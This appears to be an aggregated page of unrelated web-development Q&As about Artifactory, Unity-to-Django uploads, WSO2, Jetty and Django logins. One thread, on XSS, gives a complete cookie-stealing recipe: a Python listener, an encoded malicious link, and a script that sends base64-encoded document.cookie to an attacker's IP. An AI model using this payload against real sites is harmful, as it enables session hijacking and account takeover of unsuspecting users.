requests.delete provokes a GET instead of DELETE on artifactory - python-2.7

So, I'm trying to clean up my artifactory which runs on tomcat.
I've written a script that give me what I want.
However, when I do a requests.delete() and look in the access logs, I see a GET request for the used URL, and nothing is deleted.
Code:
import requests
username="admin"
password="SomeSecurePassword"
r = requests.delete('http://artifactory.company.com/artifactory/api/storage/libs-release-local/my/path/to/delete/0.1.62', auth = (username, password))
Log:
10.10.5.200 - - [07/Apr/2017:16:44:28 +0200] "GET /artifactory/api/storage/libs-release-local/my/path/to/delete/0.1.62
HTTP/1.1" 200 579
I suspect either a tomcat or an artifactory configuration has to be changed, but I don't know where to start looking.
Google didn't turn anything up off the bat for either artifactory or Python.

The delete item REST API is using the following request format:
DELETE http://artifactory.company.com/artifactory/libs-release-local/my/path/to/delete/0.1.62
Please note you do not need /api/storage as part of request URL.

Related

XSS Attack without Web Hosting

I am learning about XSS attacks.
Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.
My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.
I don't have a web server to host my cookie-capture script.
What should I do?
You can set up an HTTP server on your own computer quite easily.
For example, Python 3 supports the following one-liner HTTP server:
python -m http.server 8000
This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.
All incoming requests will be logged on the command line terminal. So if you're trying to fetch an admin's cookie value, you could create a link like this (I'm assuming here that your IP address is 12.34.56.78; you can get the correct value from Google):
http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
This will run the following script on the target server:
<script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:
$ python -m http.server 8000
99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -

Unity 2017.3 HTTP POST request always empty when it hits web app (Django)

I'm trying to use Unity 2017.3 to send a basic HTTP POST request from Unity scripting. I want to send an image data, which I can access in my script either as file.png or in a byte[]. I am only posting to a local server running Python/Django, and the server does register the POST request coming in - but no matter what I do the request arrives empty of any content, body, files or raw data at my web app.
IEnumerator WriteAndSendPng() {
#extra code that gets bytes from a render texture goes here
#can verify that drawing.png is a valid image for my purposes
System.IO.File.WriteAllBytes("drawing.png", bytes);
List<IMultipartFormSection> formData = new List<IMultipartFormSection>();
formData.Add( new MultipartFormFileSection ("drawing", bytes, "drawing.png", "image/png") );
UnityWebRequest www = UnityWebRequest.Post("http://127.0.0.1:8000/predict/", formData);
yield return www.SendWebRequest();
if(www.isNetworkError || www.isHttpError) Debug.Log(www.error);
else Debug.Log("Form upload complete!");
}
I'm following the docs and there are a bunch of constructors for MultipartFormFileSection, most of which I feel like I've tried. Also tried UploadHandlers, or the old AddBinaryField WWW API - still the request is always empty when it hits my app... I've read the thorough response to this SO ticket, Sending http requests in C# with Unity. I have tried many of the implementations here but again, Django receives empty requests. Even submitting the simplest possible request from Unity sends empty requests. So weird.
List<IMultipartFormSection> formData = new List<IMultipartFormSection>();
formData.Add (new MultipartFormDataSection ("someVar=something"));
The Python server just sees:
[11/Feb/2018 14:14:12] "POST /predict/ HTTP/1.1" 200 1
>>> print(request.method) # POST
>>> print(request.encoding) # None
>>> print(request.content_type) #multipart/form-data
>>> print(request.POST) # <QueryDict: {}>
>>> print(request.body) # b''
I thought it might be a Django issue, but posting to the same app w/ Postman or from other sources, it sees the incoming data just fine. Anyone done this recently? I thought this would be a piece of cake and many hours into into it I remain stymied. All help appreciated! Thanks, all.
Figured it out courtesy of Unity staffer Aurimas-Cernius on their forums: "The issue most likely is that your Django server does not support HTTP 1.1 chunked transfer. You can either try updating your server, or set chunkedTransfer property on UnityWebRequest to false."
He was right. Setting that flag to false allowed me to start sending simple test case data and receiving it as expected in the Django app - bet I'll be able to get images working in no time. I was also experiencing side effects of using Python 3.5.x (mistakenly assuming I needed to). Upgrading that fixed the chunk issue, too. Cheers!

Can't Access WS02 IDS Management Console

I'm trying to configure a fresh install of the WSO2 IDS on my local machine for development purposes.
When I try to log onto the management console at https://localhost:9443/ with the default admin credentials the website displays an error:
"Login failed! Please recheck the username and password and try again."
When I look at the audit.log I see:
INFO {AUDIT_LOG}- 'admin#carbon.super [-1234]' logged in at [2017-10-06 17:20:13,537-0500]
When I look at the http_access.log I am seeing:
"POST /carbon/admin/js/csrfPrevention.js HTTP/1.1" 200 63 "https://localhost:9443/carbon/admin/login.jsp?loginStatus=false"
I've checked to make sure csrf is turned off during debugging this in the following locations. I don't see any reference to CSRF in these files:
- /repository/conf/carbon.xml
- /repository/conf/tomcat/catalina-server.xml
- /repository/conf/tomcat/carbon/WEB-INF/web.xml
- /WEB-INF/web.xml
The install is a fresh download of wso2-5.3. The only configuration change from the default download I have made is to /repository/conf/tomcat/carbon/WEB-INF/web.xml where I disabled the captcha filter (it wouldn't start with captcha enabled).
I'm not sure what the problem is, but would appreciate any help
edit:
I found the answer in the WSO2 Jira (sorry not enough rep to link)
The guides tell you to start the server with the following command:
sh bin/wso2server.sh -DworkerNode
If you remove -DworkerNode it works.
See the first tip in this document:
https://docs.wso2.com/display/CLUSTER44x/Clustering+Identity+Server+5.1.0%2C+5.2.0+and+5.3.0

How do I prevent access to my Jetty server from unwanted URLs

How do I prevent access to my Jetty server from unwanted URLs
10.34.6.67 - - [20/Jan/2015:13:04:05 +0000] "GET /pulse?authon&user=BB493827B64FD8B696FD0B600FA05429&url_heartbeat=1,0,156,156,0&db_conn=1,0,0,0,0 HTTP/1.1" 404 283
In order to determine if a requested URL is valid or not, the connection still needs to occur, and the request still needs to be sent.
The access log line you pasted shows that Jetty returned 404 (not found) for it.
Looks like it did the job with no further effort on your part.

Can't log in to django

I've just installed my app on a new server to test something out. Setup all went smoothly, app is running fine with a local mysql database behind it which is fully synced up. The only problem is I can't log in.
I've tried logging in via my frontend, and via the admin. For both, if I enter incorrect details it shows an error message. If I enter correct details it doesn't, but still throws me back to the login page.
There is nothing in the logs to suggest what's going on, all I get in a runserver log is something like:
[26/Jun/2013 15:09:31] "POST /account/login/ HTTP/1.0" 302 0
[26/Jun/2013 15:09:31] "GET /dashboard/ HTTP/1.0" 302 0
[26/Jun/2013 15:09:31] "GET /account/login/?next=/dashboard/ HTTP/1.0" 200 2537
I'm clearly logging in ok, being redirected to the dashboard, then bounced straight back to login.
I'm stumped as to where to start looking to debug this problem. The same setup is running fine elsewhere. Can anyone give me any clues as to where to start looking?
You might check the value of SESSION_COOKIE_SECURE. If set to True, the admin login form will simply redirect to itself. Also check that SESSION_COOKIE_DOMAIN is correct. I don't know how many times I've done this inadvertently in development :)